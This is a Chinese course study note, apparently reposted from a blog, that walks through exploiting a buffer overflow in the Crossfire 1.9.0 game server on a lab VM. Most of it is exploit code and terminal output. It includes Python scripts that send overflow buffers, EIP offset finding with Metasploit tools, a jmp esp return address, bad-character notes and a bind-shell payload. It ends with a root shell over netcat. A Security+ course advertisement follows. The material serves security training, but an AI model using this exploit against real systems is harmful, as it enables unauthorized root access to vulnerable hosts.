安全牛学习笔记Linux缓冲区溢出
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记Linux缓冲区溢出相关的知识,希望对你有一定的参考价值。
Linux缓冲区溢出
FUZZING
Crossfire
1.9.0版本接受入展socket连接时攒在缓冲区溢出漏洞
调试工具
edb
运行平台
Kali i486虚拟机
[email protected]:~# cd /usr/games/
[email protected]:/usr/games# ls
crossfire
[email protected]:/usr/games# rm -rf crossfire
[email protected]:~# mv crossfie.tar.gz /usr/games/
[email protected]:~# cd /usr/games/
[email protected]:/usr/games# ls
crossfire.tar.gz
[email protected]:/usr/games# tar zxpf cossfire.tar.gz
[email protected]:/usr/games# ls
crossfile crossfire.tar.gz
[email protected]:/usr/games# ls -l
total 4860
drwxr-xr-x 8 root root 4096 Feb 10 2010 crossfire
-rwxrwx--- 1 root root 4968636 Aug 31 09:12 crossfire.tar.gz
[email protected]:/usr/games# cd crossfire/
[email protected]:/usr/games/crossfire# ls
bin etc lib man share var
[email protected]:/usr/games/crossfire# cd bin/
[email protected]:/usr/games/crossfire/bin# ls
crossedit crossfire-config crossloop-pl player_dl.pl
crossfire crossloop crossloop.web
[email protected]:/usr/games/crossfire/bin# ./crossfire
Unable to open /var/log/crossfire/logfile as the logfile - will use stderr instead
Couldn‘t find archetypt horn_waves
Warning: failed to find arch horn_waves
Couldn‘t find treasurelist sarcophagus
Filed to link treasure to arch (sarcophagus_container): sarcophagus
Welcome to CrossFile. v1.9.0
Copyright (C) 1994 Mark Wedel
Copyright (C) 1992 Frank Tore Johansen.
----------registering SIGPIPE
Initializing plugins
Plugins directory is /usr/games/crossfire/lib/crossfir/plugins/
-> Loading plugin : cfpython.so
Error trying to load /usr/games/crossfire/lib/crossfir/plugins/cfpython.so: lib
python2.5.so.1.0: cannot open shared object file: No such file or directory
-> Loading plugin : cfpython.so
CFAnim 2.0a init
CFAnim 2.0a post init
Warting for connections...
逆向工程---->edb-debugger
ollydbg
FUZZING
本机调试
iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP
iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP
[email protected]:/usr/games/crossfire/bin# iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP
[email protected]:/usr/games/crossfire/bin# iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP
[email protected]:/usr/games/crossfire/bin# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere !localhost tcp dpt:4444
DROP tcp -- anywhere !localhost tcp dpt:13327
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
FUZZING
解压
/usr/games
tar zxpg crossfire.tar.gz
调试
edb -run /usr/games/crossfire/bin/crossfire
01.py
[email protected]:~# edb -run /usr/games/crossfire/bin/crossfire
Starting edb version: 0.9.20
Please Report Bugs & Requests At: http://bugs.codef00.com/
No symbol path specified. Please set it in the preferences to enable symbols.
NO session path specified, Using current working directory.
[SessionManager] loading session file: "/root/crossfire.edb" for: "/usr/games/crossfire/bin/crossfire"
No mian symbol found, calculated it to be "08085ae0" using heuristic
comparing versions: [2324] [2324]
No session path specified, Using crrent working directory.
[SessionManager] saving session file: "/root/crossfire.edb" for: "/usr/games/crossfire/bin/crossfire"
点两次run,变成running
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# netstat -pantu | grep 13327
tcp 0 0 0.0.0.0:13327 LISTEN
3521/crossfire
[email protected]:~# ps aux | grep 13327
root 3581 0.0 0.0 3504 1856 pts/2 S+ 09:29 0:00 grep 1337
[email protected]:~# kill 3521
[email protected]:~# netstat -pantu | grep 13327 //运行调试命令
[email protected]:~# netstat -pantu | grep 13327 //打开edb-debugger
[email protected]:~# netstat -pantu | grep 13327 //第一次run
[email protected]:~# netstat -pantu | grep 13327 //第二次run
tcp 0 0 0.0.0.0:13327 LISTEN
3593/crossfire
╭────────────────────────────────────────────╮
[01.py]
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = "\x41" + 4379
buffer = "\x11(setup sound" + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"
╰────────────────────────────────────────────╯
[email protected]:~# edb -run /usr/games/crossfire/bin/crossfire
Starting edb version: 0.9.20
Please Report Bugs & Requests At: http://bugs.codef00.com/
No symbol path specified. Please set it in the preferences to enable symbols.
NO session path specified, Using current working directory.
[SessionManager] loading session file: "/root/crossfire.edb" for: "/usr/games/crossfire/bin/crossfire"
No mian symbol found, calculated it to be "08085ae0" using heuristic
comparing versions: [2324] [2324]
No session path specified, Using crrent working directory.
[SessionManager] saving session file: "/root/crossfire.edb" for: "/usr/games/crossfire/bin/crossfire"
点两次run,变成running
[email protected]:~# ./01.py
┃FUZZING
┃唯一字符串识别EIP精确位置
┃ /usr/share/metasploit-framework/tools/pattern_create.rb 4379
┃ 02.py
┃ /usr/share/metasploit-framework/tools/pattern_offset.rb 46367046
┃ 4368
┃ 03.py
[email protected]:~# cd /usr/share/metasploit-framework/tools/
[email protected]:/usr/share/metasploit-framework/tools# ./pa
pattern_create.rb pattern_offset.rb payload_lengths.rb
[email protected]:/usr/share/metasploit-framework/tools# ./pattern_create.rb 437
╭────────────────────────────────────────────╮
[02.py]
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = ‘ */溢出字符串/* ‘
buffer = "\x11(setup sound" + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"
╰────────────────────────────────────────────╯
[email protected]:~# ./02.py
[*]Sending evil buffer...
#version 1023 1027 Crossfire Server
[*]Payload Sent!
[email protected]:~# cd /usr/share/metasploit-framework/tools/
[email protected]:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 46367046
[*] Exact mathc at of set 4368
╭────────────────────────────────────────────╮
[03.py]
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = ‘A‘*4368 + ‘B‘*4 + ‘C‘*7
#crash = ‘A‘*4368 + ‘B‘*4 + ‘\x83\xc0\xc0\xff\xe0\x90\x90‘
buffer = "\x11(setup sound" + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"
╰────────────────────────────────────────────╯
[email protected]:~# ./03.py
[*]Sending evil buffer...
#version 1023 1027 Crossfire Server
[*]Payload Sent!
┃FUZZING
┃思路:
┃第一阶段shellcode
┃ ESP跳转到EAX
┃ 便宜12个字节
┃setup sound shellcode2
┃/usr/share/metasploit-framework/tools/nasm_shell.rb
┃ add eax,12
┃ jmp eax
┃\x83\xc0\x0c\xff\xe0\x90\x90
[email protected]:~# cd /usr/share/metasploit-framework/tools/
[email protected]:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > add eax,12
00000000 83C00C add eax,bytes +0xc
nasm > jmp eax
00000000 FFE0 jmp eax
FUZZING
查找坏字符
\x00\x0a\x0b\x20
┃FUZZING
┃ESP跳转地址
┃ Opcode serach
┃ crash="\x41"*4368 + "\x97\x45\x13\x00" + "\x83\xc0\x0c\xff\xe0\x90\x90"
┃设断点(0x08134597)
┃ EIP-----08134597
┃ jmp esp
┃ add eax,12
┃ jmp eax
┃FUZZING
┃msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | msfencode -b ┃
┃"\x00\x0a\x0b\x20"
┃05.py
╭────────────────────────────────────────────╮
[04.py]
#!/usr/bin/python
import socket
host = "127.0.0.1"
crash = ‘A‘*4368 + ‘\x97\x45\x13\x00‘ + ‘\x83\xc0\x0c\xff\xe0\x90\x90‘
#crash = ‘A‘*4368 + ‘B‘*4 + ‘\x83‘ + ‘\xc0‘ + ‘\xc0‘ + ‘\xff‘ + ‘\xe0‘
buffer = "\x11(setup sound" + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"
╰────────────────────────────────────────────╯
[email protected]:~# ./04.py
[*]Sending evil buffer...
#version 1023 1027 Crossfire Server
[*]Payload Sent!
[email protected]:~# msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | msfencode -b "\x00\x0a\x0b\x20"
────────────────────────────────────────────╮
[05.py]
#!/usr/bin/python
import socket
host = "127.0.0.1"
shellcode = (
// 溢出字符串
)
crash = shellcode + ‘A‘*(4368-105) + ‘\x97\x45\x13\x00‘ + ‘\x83\xc0\x0c\xff\xe0\x90\x90‘
‘
buffer = "\x11(setup sound" + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data=s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"
╰────────────────────────────────────────────╯
[email protected]:~# cd /usr/share/games/crossfire/bin
[email protected]:/usr/share/games/crossfire/bin# ./crossfire
[email protected]:~# ./05.py
[*]Sending evil buffer...
#version 1023 1027 Crossfire Server
[*]Payload Sent!
[email protected]:~# netstat -pantu | grep 4444
tcp 0 0 0.0.0.0:4444 LISTEN
4300/crossfire
[email protected]:~# nc 127.0.0.1 4444
id
uid=0(root) gid=0(root) group=0(root)
ls
crossedit
crossfire
crossfrie-config
crossloop
crossloop.pl
croosloop.web
player_dl.pl
pwd
/usr/games/crossfrie
[email protected]:~# find / -name msfpayload
/usr/share/framework2/msfpayload
/usr/share/framework2/data/msfpayload
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
近期,安全牛课堂在做此类线上培训,感兴趣可以了解
本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1965547
以上是关于安全牛学习笔记Linux缓冲区溢出的主要内容,如果未能解决你的问题,请参考以下文章